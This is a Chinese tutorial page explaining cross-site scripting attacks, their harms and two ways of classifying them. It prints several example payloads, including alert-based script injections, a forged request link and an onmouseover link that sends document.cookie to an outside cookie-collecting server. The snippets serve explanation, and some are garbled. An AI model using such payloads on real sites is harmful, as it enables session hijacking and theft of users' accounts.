45IT.COM- 电脑学习从此开始!
DIY硬件教程攒机经验装机配置
设计Photoshop网页设计特效
系统注册表DOS系统命令其它
存储主板显卡外设键鼠内存
维修显卡CPU内存打印机
WinXPVistaWin7unix/linux
CPU光驱电源/散热齐乐娱乐其它
修技主板硬盘键鼠齐乐娱乐光驱
办公ExcelWordPowerPointWPS
编程齐乐娱乐CSS脚本PHP
网络局域网QQ服务器
软件网络系统图像安全
页面导航: 首页 > 电脑学院 > 网络安全 >

XSS攻击的原理

电脑软硬件应用网 45IT.COM 时间:2014-06-28 11:42 作者:佚名
概念说明 Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或
概念说明 Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码,当用户浏览该页或者进行某些操作时,攻击者利用用户对原网站的信任,诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。 比如:攻击者在论坛中放一个看似安全的链接,骗取用户点击后,窃取cookie中的用户私密信息;或者攻击者在论坛中加一个恶意表单,当用户提交表单的时候,却把信息传送到攻击者的服务器中,而不是用户原本以为的信任站点。 诸如此类,唯一能完全杜绝xss攻击的方法,就是禁用script,img等,显然这是不靠谱的,用户需要丰富的页面内容;当然我们可以用一些方法预防xss攻击,尽量减少xss造成的危害。 盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 盗窃企业重要的具有商业价值的资料 非法转账 强制发送电子邮件 网站挂马 控制受害者机器向其它网站发起攻击 举例: <body background=”javascript:alert(‘xss – gotcha!’)”> <iframe src=javascript:alert(‘xss – gotcha!’)></iframe> > </body><body onload=”a();”><script>function a(){alert(‘xss -gotcha!’);}</script>< ” xss攻击分类 分类方法一 xss攻击分为两类:从其它站点到应用站点的攻击、从应用站点到同站或其它站点的攻击 从其它站点到应用站点的攻击:故名思义,这种攻击是由外部发起的,来自email或其它站点。这种攻击在用户点击链接,下载图片或者提交表单的时候,对应用网站进行了意想之外的操作。 通常用户登录后会得到一个可用session,xss攻击者可以利用这个session,越过用户验证,进行一些不安全的操作,如下: <a href = “http://www.abc.com/submit.php?subject rel="nofollow" = I%20am%20owned” >Check it out! 通过这个链接,只要用户登录了,就会发送一个subject,即使在其它网站上。 正因如此,一般的邮箱客户端不会自动从不信任的网站上加载图片(因为考虑到可以通过img的src属性向第三方站点发送GET请求);另外,可以设置session的过期时间,让session自动失效。 从应用站点到同站或其它站点的攻击:这种攻击,通常是攻击者在应用站点上通过发表评论,或者其它方式嵌入代码,当用户加载页面或者点击链接就会产生一些意想之外的操作。 如下: <a href="http://theoent.com/rdquo;#&rdquo" onmouSEOver = “window.location = ‘http://abc.com/collectCookie.php?cookie = + document cookie.escape();” >Check it out!</a> 当用户滑过链接,就会将cookie信息发到攻击者的服务器上。 分类方法二 xss的另一种分类方法(个人感觉更清楚),将xss攻击分为三种, 类型A,本地利用漏洞,这种漏洞存在于页面中客户端脚本自身。 其攻击过程如下: Alice给Bob发送一个恶意构造了Web的URL。 Bob点击并查看了这个URL。 恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在Bob电脑上。 具有漏洞的HTML页面包含了在Bob电脑本地域执行的JavaScript。 Alice的恶意脚本可以在Bob的电脑上执行Bob所持有的权限下的命令。 类型B 反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
你可能感兴趣的文章
  1. 使用PHP三个函数来修补xss漏洞
推荐知识
  1. 这年头谁没被盗过号 盘点玩家被盗号的10大原 玩网络游戏被盗号是很正常的现象,一个人玩网游没被盗过号简直都有点不好意思出去跟人...
  2. 桌面图标无法删除 如何删除桌面图标? 问答:桌面图标无法删除 如何删除桌面图标呢? 网友:我电脑在安装一个软件后,两个百...
  3. 四招帮你有效保障网上支付时的安全 不少用户出于省事考虑,在微博、邮箱等网站上使用与网络支付账号相同的账户和密码,最...
  4. 新手安全上网的五个技巧 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原...
  5. 教你揪出伪装系统木马并清除 面对日新月异的病毒和木马,有时利用手工检查及清除病毒,还是有必要的,本文以伪装成...
齐乐娱乐